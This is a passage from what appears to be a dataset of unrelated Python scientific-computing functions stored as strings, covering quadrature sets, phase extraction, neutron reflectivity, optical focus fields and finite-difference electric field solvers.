2 * deg + 2 )\n\n # have to work on this through \"tabulate\" interface\n # first, tabulate PkH at quadrature points\n Qpts = numpy.array( Q.get_points() )\n Qwts = numpy.array( Q.get_weights() )\n\n zero_index = tuple( [ 0 for i in range(sd) ] )\n\n PkH_at_Qpts = PkH.tabulate( Qpts )[zero_index]\n Pkp1_at_Qpts = Pkp1.tabulate( Qpts )[zero_index]\n\n PkHx_coeffs = numpy.zeros( (PkH.get_num_members() , \\\n sd, \\\n Pkp1.get_num_members()) , \"d\" )\n\n import time\n t1 = time.time()\n for i in range( PkH.get_num_members() ):\n for j in range( sd ):\n fooij = PkH_at_Qpts[i,:] * Qpts[:,j] * Qwts\n PkHx_coeffs[i,j,:] = numpy.dot( Pkp1_at_Qpts , fooij )\n\n PkHx = polynomial_set.PolynomialSet( ref_el , \\\n deg , \\\n deg + 1 , \\\n vec_Pkp1.get_expansion_set() , \\\n PkHx_coeffs , \\\n vec_Pkp1.get_dmats() )\n\n return polynomial_set.polynomial_set_union_normalized( vec_Pk_from_Pkp1 , PkHx )", "def Build_quadrant(self) :\n\n self.omega = np.zeros((self.n_dir,3))\n self.weight = np.zeros((self.n_dir))\n\n if self.sn==2 :\n direction = 0.577350269189625764509149\n weight = 1.\n\n self.omega[0,0] = direction\n self.omega[0,1] = direction\n self.omega[0,2] = direction\n \n self.weight[0] = weight\n \n elif self.sn==4 :\n direction_1 = 0.350021174581540677777041\n direction_2 = 0.868890300722201205229788\n weight = 1./3.\n\n self.omega[0,0] = direction_2\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_1\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_1\n self.omega[2,2] = direction_2\n\n self.weight[0] = weight\n self.weight[1] = weight\n self.weight[2] = weight\n\n elif self.sn==6 :\n direction_1 = 0.266635401516704720331535\n direction_2 = 0.681507726536546927403750\n direction_3 = 0.926180935517489107558380\n weight_1 = 0.176126130863383433783565\n weight_2 = 0.157207202469949899549768\n\n self.omega[0,0] = direction_3\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_2\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_1\n self.omega[3,2] = direction_2\n \n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_2\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_1\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_3\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_1\n self.weight[3] = weight_2\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n\n elif self.sn==8 :\n direction_1 = 0.218217890235992381266097\n direction_2 = 0.577350269189625764509149\n direction_3 = 0.786795792469443145800830\n direction_4 = 0.951189731211341853132399\n\n weight_1 = 0.120987654320987654320988\n weight_2 = 0.0907407407407407407407407\n weight_3 = 0.0925925925925925925925926\n\n self.omega[0,0] = direction_4\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_3\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_2\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_1\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_3\n self.omega[4,1] = direction_1\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_2\n self.omega[5,1] = direction_2\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_1\n self.omega[6,1] = direction_3\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_1\n self.omega[7,2] = direction_3\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_2\n self.omega[8,2] = direction_3\n\n self.omega[9,0] = direction_1\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_2\n self.weight[3] = weight_1\n self.weight[4] = weight_2\n self.weight[5] = weight_3\n self.weight[6] = weight_2\n self.weight[7] = weight_2\n self.weight[8] = weight_2\n self.weight[9] = weight_1\n\n elif self.sn==10 :\n direction_1 = 0.189321326478010476671494\n direction_2 = 0.508881755582618974382711\n direction_3 = 0.694318887594384317279217\n direction_4 = 0.839759962236684758403029\n direction_5 = 0.963490981110468484701598\n\n weight_1 = 0.0893031479843567214704325\n weight_2 = 0.0725291517123655242296233\n weight_3 = 0.0450437674364086390490892\n weight_4 = 0.0539281144878369243545650\n\n self.omega[0,0] = direction_5\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_4\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_3\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n \n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_5\n self.omega[4,2] = direction_1\n\n self.omega[5,0] = direction_4\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_3\n self.omega[6,1] = direction_2\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_3\n self.omega[7,2] = direction_2\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_4\n self.omega[8,2] = direction_2\n\n self.omega[9,0] = direction_3\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_3\n\n self.omega[10,0] = direction_2\n self.omega[10,1] = direction_2\n self.omega[10,2] = direction_3\n\n self.omega[11,0] = direction_1\n self.omega[11,1] = direction_3\n self.omega[11,2] = direction_3\n\n self.omega[12,0] = direction_2\n self.omega[12,1] = direction_1\n self.omega[12,2] = direction_4\n\n self.omega[13,0] = direction_1\n self.omega[13,1] = direction_2\n self.omega[13,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_2\n self.weight[4] = weight_1\n self.weight[5] = weight_2\n self.weight[6] = weight_4\n self.weight[7] = weight_4\n self.weight[8] = weight_2\n self.weight[9] = weight_3\n self.weight[10] = weight_4\n self.weight[11] = weight_3\n self.weight[12] = weight_2\n self.weight[13] = weight_2\n self.weight[14] = weight_1\n\n elif self.sn==12 :\n direction = np.zeros((6,1))\n\n direction[0] = 0.167212652822713264084504\n direction[1] = 0.459547634642594690016761\n direction[2] = 0.628019096642130901034766\n direction[3] = 0.760021014833664062877138\n direction[4] = 0.872270543025721502340662\n direction[5] = 0.971637719251358378302376\n\n weight_1 = 0.0707625899700910439766549\n weight_2 = 0.0558811015648888075828962\n weight_3 = 0.0373376737588285824652402\n weight_4 = 0.0502819010600571181385765\n weight_5 = 0.0258512916557503911218290\n\n for i in xrange(0,6) :\n self.omega[i,0] = direction[5-i]\n self.omega[i,1] = direction[i]\n self.omega[i,2] = direction[0]\n \n offset = 6\n for i in xrange(0,5) :\n self.omega[offset+i,0] = direction[4-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[1]\n\n offset += 5\n for i in xrange(0,4) :\n self.omega[offset+i,0] = direction[3-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[2]\n \n offset += 4\n for i in xrange(0,3) :\n self.omega[offset+i,0] = direction[2-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[3]\n\n offset += 3\n for i in xrange(0,2) :\n self.omega[offset+i,0] = direction[1-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[4]\n \n offset += 2\n self.omega[offset+i,0] = direction[0]\n self.omega[offset+i,1] = direction[1]\n self.omega[offset+i,2] = direction[5]\n\n self.weight[0] = weigth_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_3\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n self.weight[6] = weight_2\n self.weight[7] = weight_4\n self.weight[8] = weight_5\n self.weight[9] = weight_4\n self.weight[10] = weight_2\n self.weight[11] = weight_3\n self.weight[12] = weight_5\n self.weight[13] = weight_5\n self.weight[14] = weight_3\n self.weight[15] = weight_3\n self.weight[16] = weight_4\n self.weight[17] = weight_3\n self.weight[18] = weight_2\n self.weight[19] = weight_2\n self.weight[20] = weight_1", "def extract_phase(eigvector, point_arr=[]):\n pa = point_arr\n if np.size(pa) == 0:\n pa = np.arange(len(evY))\n\n evX = eigvector[2 * pa]\n evY = eigvector[2 * pa + 1]\n phase = np.arctan2(evY.real, evX.real)\n # print 'evY[0] =', evY[0]\n # print 'evX[0] =', evX[0]\n # print 'phase[0] = ', phase[0]\n return phase", "def get_phase(self,):\n\n # for comparison\n initial_state = self._read('CPOW0')\n\n POW_step = 0.02197265\n POW = 0x00 | initial_state[0] << 8 | initial_state[1]\n phase = round(POW*POW_step, 2)\n\n print ('Latest phase set (i.e. currently in register):', phase)\n\n return self.phases", "def relative_phases(self):\r\n return np.angle(self.coherency)", "def relative_phases(self):\r\n return np.angle(self.coherency)", "def rk4_damp(xy, v, NL, KL, BM, Mm, beta, h):\n dx1 = h * v\n dv1 = h * fdspring(xy, v, NL, KL, BM, Mm, beta)\n dx2 = h * (v + dv1 / 2.)\n dv2 = h * fdspring(xy + dx1 / 2., v + dv1 / 2., NL, KL, BM, Mm, beta) # xy,NL,KL,BM, Mm, beta, NP,nn\n dx3 = h * (v + dv2 / 2.)\n dv3 = h * fdspring(xy + dx2 / 2., v + dv2 / 2., NL, KL, BM, Mm, beta)\n dx4 = h * (v + dv3)\n dv4 = h * fdspring(xy + dx3, v + dv3, NL, KL, BM, Mm, beta)\n xout = xy + (dx1 + 2. * dx2 + 2. * dx3 + dx4) / 6.\n vout = v + (dv1 + 2. * dv2 + 2. * dv3 + dv4) / 6.\n\n # print 'rk BM = ', BM\n return dx1, dv1, dx2, dv2, dx3, dv3, dx4, dv4, xout, vout", "def pnr(q, layers):\n xx = np.asfarray(q).astype(np.complex128).ravel()\n\n thetas = np.radians(layers[:, 4])\n thetas = np.diff(thetas)\n\n # nuclear SLD minus that of the superphase\n sld = layers[:, 1] + 1j * layers[:, 2] - layers[0, 1] - 1j * layers[0, 2]\n\n # nuclear and magnetic\n sldu = sld + layers[:, 3] - layers[0, 3]\n sldd = sld - layers[:, 3] + layers[0, 3]\n sldu *= 1e-6\n sldd *= 1e-6\n\n # wavevector in each layer\n kn_u = np.sqrt(0.25 * xx[:, np.newaxis] ** 2 - 4 * np.pi * sldu)\n kn_d = np.sqrt(0.25 * xx[:, np.newaxis] ** 2 - 4 * np.pi * sldd)\n\n mm = np.zeros((xx.size, 4, 4), np.complex128)\n mm[:] = np.identity(4, np.complex128)\n\n # iterate over layers\n for jj in range(len(layers) - 2):\n d, d_inv = _dmatrix(kn_u[:, jj + 1], kn_d[:, jj + 1])\n p = _pmatrix(kn_u[:, jj + 1], kn_d[:, jj + 1], layers[jj + 1, 0])\n r = _rmatrix(thetas[jj + 1])\n\n mm = mm @ d @ p @ d_inv @ r\n\n # d_inv for the first layer\n _, d_inv = _dmatrix(kn_u[:, 0], kn_d[:, 0])\n\n # d for the last layer\n d, _ = _dmatrix(kn_u[:, -1], kn_d[:, -1])\n r = _rmatrix(thetas[0])\n\n M = d_inv @ r @ mm @ d\n\n # equation 16 in Blundell and Bland\n den = M[:, 0, 0] * M[:, 2, 2] - M[:, 0, 2] * M[:, 2, 0]\n # uu\n pp = _magsqr((M[:, 1, 0] * M[:, 2, 2] - M[:, 1, 2] * M[:, 2, 0]) / den)\n\n # dd\n mm = _magsqr((M[:, 3, 2] * M[:, 0, 0] - M[:, 3, 0] * M[:, 0, 2]) / den)\n\n # ud\n pm = _magsqr((M[:, 3, 0] * M[:, 2, 2] - M[:, 3, 2] * M[:, 2, 0]) / den)\n\n # du\n mp = _magsqr((M[:, 1, 2] * M[:, 0, 0] - M[:, 1, 0] * M[:, 0, 2]) / den)\n\n return (pp, mm, pm, mp)", "def calc_phase(p, t):\n\n return (t % p)/p", "def focus_field_beam(shape = (128,128,128),\n units = (0.1,0.1,0.1),\n lam =.5, NA = .6, n0 = 1.,\n return_all_fields = False,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n \n Nx0, Ny0, Nz0 = shape\n dx, dy, dz = units\n\n #FIXME: the loop below does not yet work for odd inputs\n if not Nx0%2+Ny0%2+Nz0%2==0:\n raise NotImplementedError(\"odd shapes not supported yet\")\n\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n # as we assume the psf to be symmetric, we just have to calculate each octant\n Nx = Nx0//2+1\n Ny = Ny0//2+1\n Nz = Nz0//2+1\n\n u_g = OCLArray.empty((Nz,Ny,Nx),np.float32)\n ex_g = OCLArray.empty(u_g.shape,np.complex64)\n ey_g = OCLArray.empty(u_g.shape,np.complex64)\n ez_g = OCLArray.empty(u_g.shape,np.complex64)\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n \n p.run_kernel(\"debye_wolf\",u_g.shape[::-1],None,\n ex_g.data,ey_g.data,ez_g.data, u_g.data,\n np.float32(1.),np.float32(0.),\n np.float32(0.),np.float32(dx*(Nx-1.)),\n np.float32(0.),np.float32(dy*(Ny-1.)),\n np.float32(0.),np.float32(dz*(Nz-1.)),\n np.float32(lam), np.float32(n0),\n alpha_g.data, np.int32(len(alphas)))\n\n u = u_g.get()\n ex = ex_g.get()\n ey = ey_g.get()\n ez = ez_g.get()\n\n u_all = np.empty((Nz0,Ny0,Nx0),np.float32)\n ex_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ey_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ez_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n\n sx = [slice(0,Nx),slice(Nx,Nx0)]\n sy = [slice(0,Ny),slice(Ny,Ny0)]\n sz = [slice(0,Nz),slice(Nz,Nz0)]\n\n\n\n # spreading the calculated octant to the full volume\n for i,j,k in itertools.product([0,1],[0,1],[0,1]):\n\n # i, j, k = 0 indicates the + octant\n\n u_all[sz[1-i],sy[1-j],sx[1-k]] = u[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n if i ==0:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n\n else:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n\n if return_all_fields:\n return u_all, ex_all, ey_all, ez_all\n else:\n return u_all", "def efSolver2(self):\n dx = self.dh[0] # dx\n dy = self.dh[1] # dy\n dz = self.dh[2] # dz\n \n \"\"\"\n for i in np.arange(0, self.ni):\n for j in np.arange(0, self.nj):\n for k in np.arange(0, self.nk):\n \"\"\"\n\n ##x-component#\n #if i==0: \n #x-component#\n \"\"\"\n if i==0: \n # forward\n self.ef[i][j][k][0] = -(-3*self.phi[i][j][k]+\\\n 4*self.phi[i+1][j][k]-\\\n self.phi[i+2][j][k])/(2*dx)\n \"\"\"\n \n # forward\n self.ef[0,0:self.nj,0:self.nk,0] = -(-3*self.phi[0,0:self.nj,0:self.nk]+\\\n 4*self.phi[1,0:self.nj,0:self.nk]-\\\n self.phi[2,0:self.nj,0:self.nk])/(2*dx)\n \n #elif i==self.ni-1: \n \"\"\"\n elif i==self.ni-1: \n # backward\n self.ef[i][j][k][0] = -(self.phi[i-2][j][k]-\\\n 4*self.phi[i-1][j][k]+\\\n 3*self.phi[i][j][k])/(2*dx)\n \"\"\" \n # backward\n self.ef[self.ni-1,0:self.nj,0:self.nk,0] = -(self.phi[self.ni-3,0:self.nj,0:self.nk]-\\\n 4*self.phi[self.ni-2,0:self.nj,0:self.nk]+\\\n 3*self.phi[self.ni-1,0:self.nj,0:self.nk])/(2*dx)\n \"\"\"\n else: \n #central\n self.ef[i][j][k][0] = -(self.phi[i+1][j][k] - \\\n self.phi[i-1][j][k])/(2*dx)\n \"\"\" \n #central\n self.ef[1:self.ni-1,0:self.nj,0:self.nk,0] = -(self.phi[2:self.ni,0:self.nj,0:self.nk] - \\\n self.phi[0:self.ni-2,0:self.nj,0:self.nk])/(2*dx)\n\n\n #y-component\n #if j==0:\n \"\"\"\n if j==0:\n self.ef[i][j][k][1] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j+1][k]-\\\n self.phi[i][j+2][k])/(2*dy)\n \n \"\"\"\n self.ef[0:self.ni,0,0:self.nk,1] = -(-3*self.phi[0:self.ni,0,0:self.nk] + \\\n 4*self.phi[0:self.ni,1,0:self.nk]-\\\n self.phi[0:self.ni,2,0:self.nk])/(2*dy)\n #elif j==self.nj-1:\n \"\"\"\n elif j==self.nj-1:\n self.ef[i][j][k][1] = -(self.phi[i][j-2][k] - \\\n 4*self.phi[i][j-1][k] +\\\n 3*self.phi[i][j][k])/(2*dy)\n \n \"\"\"\n self.ef[0:self.ni,self.nj-1,0:self.nk,1] = -(self.phi[0:self.ni,self.nj-3,0:self.nk] - \\\n 4*self.phi[0:self.ni,self.nj-2,0:self.nk] +\\\n 3*self.phi[0:self.ni,self.nj-1,0:self.nk])/(2*dy)\n #else:\n \"\"\"\n else:\n self.ef[i][j][k][1] = -(self.phi[i][j+1][k] - \\\n self.phi[i][j-1][k])/(2*dy)\n\n \"\"\"\n self.ef[0:self.ni,1:self.nj-1,0:self.nk,1] = -(self.phi[0:self.ni,2:self.nj,0:self.nk] - \\\n self.phi[0:self.ni,0:self.nj-2,0:self.nk])/(2*dy)\n\n #z-component\n '''\n if k==0:\n self.ef[i][j][k][2] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j][k+1]-\n self.phi[i][j][k+2])/(2*dz)\n \n '''\n #z-component\n #if k==0:\n self.ef[0:self.ni,0:self.nj,0,2] = -(-3*self.phi[0:self.ni,0:self.nj,0] + \\\n 4*self.phi[0:self.ni,0:self.nj,1]-\n self.phi[0:self.ni,0:self.nj,2])/(2*dz)\n\n \"\"\"\n elif k==self.nk-1:\n self.ef[i][j][k][2] = -(self.phi[i][j][k-2] - \\\n 4*self.phi[i][j][k-1] + \\\n 3*self.phi[i][j][k])/(2*dz)\n \"\"\"\n \n #elif k==self.nk-1:\n self.ef[0:self.ni,0:self.nj,self.nk-1,2] = -(self.phi[0:self.ni,0:self.nj,self.nk-3] - \\\n 4*self.phi[0:self.ni,0:self.nj,self.nk-2] + \\\n 3*self.phi[0:self.ni,0:self.nj,self.nk-1])/(2*dz) \n \"\"\"\n else:\n self.ef[i][j][k][2] = -(self.phi[i][j][k+1] - \\\n self.phi[i][j][k-1])/(2*dz)\n \"\"\"\n #else:\n self.ef[0:self.ni,0:self.nj,1:self.nk-1,2] = -(self.phi[0:self.ni,0:self.nj,2:self.nk] - \\\n self.phi[0:self.ni,0:self.nj,0:self.nk-2])/(2*dz)", "def get_phase_and_composition(self):\n data = self.data\n total = data.sum()\n if total <= 0.: raise RuntimeError(f\"'{phase_names[self.phase]}' phase does not exist\")\n return self.phase, data / total", "def phase(self):\n return self.data", "def ex_4pdeer(param): \r\n param = _parsargs(param,npar=1) \r\n \r\n # Dipolar pathways\r\n lam = param[0]\r\n pathways = [\r\n [1-lam],\r\n [lam, 0]\r\n ]\r\n return pathways", "def m_phase(self):\n return self._m_phase", "def phase_derivative_var_map(image, k):\n dx_phase = delta_x(image)\n dy_phase = delta_y(image)\n\n ny, nx = dx_phase.shape\n assert(ny == nx) ## assert a square image for simplicity\n if (k%2 == 0):\n print(\"k has to be an uneven integer!\")\n return\n N = nx\n i, j = np.arange(N), np.arange(N)\n ii, jj = np.meshgrid(i, j)\n zmn = np.zeros((N,N))\n \n \n\n inside = (jj[k/2:N-(k/2), k/2:N-(k/2)].flatten(), ii[k/2:N-(k/2), k/2:N-(k/2)].flatten())\n krange = np.linspace(-1 * (k/2), (k/2), k, dtype = 'int64') ## amount of added spaces, if k = 5, it ranges from -2 to 2\n krange_tile = np.tile(krange * N, (k, 1)).T ## tile them to make a (k/2)**2 matrix, containing for instance -2N, -N, 0, N, 2N for k=5\n k_tile = np.tile(krange, (k, 1)) ## tile to add to krange_tile\n coords_add = (krange_tile + k_tile).flatten() ## all coordinates, in a (k/2)**2 matrix, from -2N - 2: -2N + 2, -N-2 : -N+2 , -2 : 2, N -2 : N +2, 2N -2 : 2N +2\n inside = np.ravel_multi_index(inside, (N, N))\n coords_add = np.tile(coords_add, (len(inside), 1)) ## stack all differences to add to inside\n inside_tile = np.tile(inside, (coords_add.shape[1],1)).T ## stack all inside to add to differences\n all_coords = inside_tile + coords_add### a matrix of len(inside) x (k/2)**2 with all coordinates in a k x k square around a certain coordinate\n unrav_coords = np.unravel_index(all_coords, (N, N)) ## unraveled coordinates of all coordinates\n \n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (all_coords.shape[1], 1)).T, np.tile(avg_y, (all_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(inside, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n\n\n #### top layers\n for i in range(k/2):\n ## for indices directly above the \"inside square\"\n top = (jj[i, k/2:N-(k/2)].flatten(), ii[i, k/2: N - (k/2)].flatten())\n coords_add = (krange_tile + k_tile)[(k/2)-i:, :].flatten()\n top = np.ravel_multi_index(top, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n top_tile = np.tile(top, (coords_add.shape[1],1)).T\n top_coords = top_tile + coords_add\n unrav_coords = np.unravel_index(top_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (top_coords.shape[1], 1)).T, np.tile(avg_y, (top_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(top, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n## sum_sin_top = np.sum(np.sin(image[unrav_coords]), axis = 1)\n## sum_cos_top = np.sum(np.cos(image[unrav_coords]), axis = 1)\n## psi_top = np.arctan2(sum_sin_top, sum_cos_top)\n## filt_psi[np.unravel_index(top, (N, N))] = psi_top\n\n ## indices directly below the \"inside square\"\n bot = (jj[N- 1 - i, k/2:N-(k/2)].flatten(), ii[N-1-i, k/2: N - (k/2)].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:(k/2) + 1 + i, :].flatten()\n bot = np.ravel_multi_index(bot, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n bot_tile = np.tile(bot, (coords_add.shape[1],1)).T\n bot_coords = bot_tile + coords_add\n unrav_coords = np.unravel_index(bot_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (bot_coords.shape[1], 1)).T, np.tile(avg_y, (bot_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(bot, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n ## indices directly left of the \"inside square\"\n left = (jj[k/2:N-(k/2), i].flatten(), ii[k/2:N-(k/2), i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, (k/2)-i:].flatten()\n left = np.ravel_multi_index(left, (N, N))\n coords_add = np.tile(coords_add, (len(left), 1))\n left_tile = np.tile(left, (coords_add.shape[1],1)).T\n left_coords = left_tile + coords_add\n unrav_coords = np.unravel_index(left_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (left_coords.shape[1], 1)).T, np.tile(avg_y, (left_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(left, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n ## indices directly left of the \"inside square\"\n right = (jj[k/2:N-(k/2), N - 1 - i].flatten(), ii[k/2:N-(k/2), N - 1 - i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, :(k/2)+1+i].flatten()\n right = np.ravel_multi_index(right, (N, N))\n coords_add = np.tile(coords_add, (len(right), 1))\n right_tile = np.tile(right, (coords_add.shape[1],1)).T\n right_coords = right_tile + coords_add\n unrav_coords = np.unravel_index(right_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (right_coords.shape[1], 1)).T, np.tile(avg_y, (right_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(right, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n return zmn", "def get_trace_spectral_phase(self, linear_comp=True):\n eps = self.phase_thr # Threshold for intensity where we have signal\n\n # Check if there is a reconstructed field:\n if self.Et is not None:\n N = self.Et.shape[0]\n w_ind = np.argsort(np.fft.fftfreq(N)) # Sorted index vector to unravel the fft:d E-field vector\n\n # Center peak in time\n ind = np.argmax(abs(self.Et))\n shift = (self.Et.shape[0] / 2 - ind).astype(np.int)\n Et = np.roll(self.Et, shift)\n\n Ew = np.fft.fft(np.fft.fftshift(Et))[w_ind]\n # Normalize\n Ew /= abs(Ew).max()\n\n # Unravelling 2*pi phase jumps\n ph0_ind = np.argmax(abs(Ew))\n ph = np.angle(Ew)\n ph_diff = np.diff(ph)\n # We need to sample often enough that the difference in phase is less than 5 rad\n # A larger jump is taken as a 2*pi phase jump\n ph_ind = np.where(np.abs(ph_diff) > 5.0)\n # Loop through the 2*pi phase jumps\n for ind in ph_ind[0]:\n if ph_diff[ind] < 0:\n ph[ind + 1:] += 2 * np.pi\n else:\n ph[ind + 1:] -= 2 * np.pi\n\n # Find relevant portion of the pulse (intensity above a threshold value)\n Ew_mag = np.abs(Ew)\n low_ind = np.where(Ew_mag < eps)\n ph[low_ind] = np.nan\n\n # Here we could go through contiguous regions and make the phase connect at the edges...\n\n # Linear compensation is we have a frequency shift (remove 1st order phase)\n if linear_comp is True:\n idx = np.isfinite(ph)\n x = np.arange(N)\n ph_poly = np.polyfit(x[idx], ph[idx], 1)\n ph_out = ph - np.polyval(ph_poly, x)\n else:\n ph_out = ph\n ph_out -= ph_out[ph0_ind]\n else:\n ph_out = None\n return ph_out", "def far_fields(horn_width, horn_height, eplane_effective_length, hplane_effective_length, frequency, r, theta, phi):\n # Calculate the wavenumber\n k = 2.0 * pi * frequency / c\n\n # Calculate the wave impedance\n eta = sqrt(mu_0 / epsilon_0)\n\n # Define the radial-component of the electric field\n e_r = 0.0\n\n # Define the theta-component of the electric field\n e_theta = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * sin(phi) * (1.0 + cos(theta)) * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the phi-component of the electric field\n e_phi = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * cos(phi) * (1.0 + cos(theta)) * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the radial-component of the magnetic field\n h_r = 0.0\n\n # 